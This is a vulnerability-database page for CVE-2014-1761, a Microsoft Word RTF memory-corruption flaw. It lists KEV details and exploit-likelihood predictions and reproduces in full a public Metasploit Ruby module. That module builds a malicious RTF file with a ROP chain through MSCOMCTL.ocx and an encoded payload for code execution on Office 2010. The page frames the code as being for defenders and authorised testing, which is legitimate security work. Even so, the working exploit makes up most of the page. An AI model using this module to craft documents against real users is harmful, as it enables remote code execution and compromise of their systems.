CVE-2014-1761

unknown KEV

Published 2022-02-15 · Modified 2022-02-15

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

2.5

Description

Microsoft Word contains a memory corruption vulnerability which when exploited could allow for remote code execution.

CISA KEV

Vendor: Microsoft
Product: Word
Due date: 2022-08-15

Predictions

Exploit likelihood

99%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-32793 local windows verified ruby · 4 KB

Metasploit · 2014-04-10

Microsoft Word - RTF Object Confusion (MS14-017) (Metasploit)

ruby exploit Source: Exploit-DB

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "MS14-017 Microsoft Word RTF Object Confusion",
      'Description'    => %q{
        This module creates a malicious RTF file that when opened in
        vulnerable versions of Microsoft Word will lead to code execution.
        The flaw exists in how a listoverridecount field can be modified
        to treat one structure as another.

        This bug was originally seen being exploited in the wild starting
        in April 2014. This module was created by reversing a public
        malware sample.
      },
      'Author'         =>
        [
          'Haifei Li', # vulnerability analysis
          'Spencer McIntyre',
          'unknown' # malware author
        ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2014-1761'],
        ['MSB', 'MS14-017'],
        ['URL', 'http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers'],
        ['URL', 'https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/']
      ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Payload'        =>
        {
          'StackAdjustment' => -3500,
          'Space'           => 375,
          'DisableNops'     => true
        },
      'Targets'        =>
        [
          # winword.exe v14.0.7116.5000 (SP2)
          [ 'Microsoft Office 2010 SP2 English on Windows 7 SP1 English',   {  } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'Apr 1 2014'))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.rtf'])
      ], self.class)
  end

  def exploit
    junk = rand(0xffffffff)
    rop_chain = [
      0x275de6ae, # ADD ESP,0C # RETN [MSCOMCTL.ocx]
      junk,
      junk,
      0x27594a2c, # PUSH ECX # POP ESP # AND DWORD PTR [ESI+64],0FFFFFFFB # POP ESI # POP ECX # RETN [MSCOMCTL.ocx]
      0x2758b042, # RETN [MSCOMCTL.ocx]
      0x2761bdea, # POP EAX # RETN [MSCOMCTL.ocx]
      0x275811c8, # ptr to &VirtualAlloc() [IAT MSCOMCTL.ocx]
      0x2760ea66, # JMP [EAX] [MSCOMCTL.ocx]
      0x275e0081, # POP ECX # RETN [MSCOMCTL.ocx]
      0x40000000,
      0x00100000,
      0x00003000,
      0x00000040,
      0x00001000,
      0x275fbcfc, # PUSH ESP # POP EDI # POP ESI # RETN 8 [MSCOMCTL.ocx]
      junk,
      0x275e0861, # MOV EAX,EDI # POP EDI # POP ESI # RETN [MSCOMCTL.ocx]
      junk,
      junk,
      junk,
      junk,
      0x275ebac1, # XCHG EAX,ESI # NOP # ADD EAX,MSORES+0x13000000 # RETN 4 [MSCOMCTL.ocx]
      0x275e0327, # POP EDI # RETN [MSCOMCTL.ocx]
      junk,
      0x40000000,
      0x275ceb04, # REP MOVS BYTE [EDI],BYTE [ESI] # XOR EAX,EAX # JMP MSCOMCTL!DllGetClassObject0x3860 [MSCOMCTL.ocx]
      junk,
      junk,
      junk,
      junk,
      0x40000040
    ].pack("V*")

    exploit_data  = [ junk ].pack("v")
    exploit_data << rop_chain
    exploit_data << payload.encoded
    exploit_data << make_nops(exploit_data.length % 2)
    exploit_data  = exploit_data.unpack("S<*")
    exploit_data  = exploit_data.map { |word| " ?\\u-#{0x10000 - word}" }
    exploit_data  = exploit_data.join

    template_part1 = 0x1e04
    template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1761.rtf")
    template_rtf = ::File.open(template_path, 'rb')

    exploit_rtf  = template_rtf.read(template_part1)
    exploit_rtf << exploit_data
    exploit_rtf << template_rtf.read

    file_create(exploit_rtf)
  end
end

Metasploit modules

exploit_windows/fileformat/ms14_017_rtf rank 300

MS14-017 Microsoft Word RTF Object Confusion

Source code queued for fetch — refresh in a moment.

References

https://nvd.nist.gov/vuln/detail/CVE-2014-1761

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.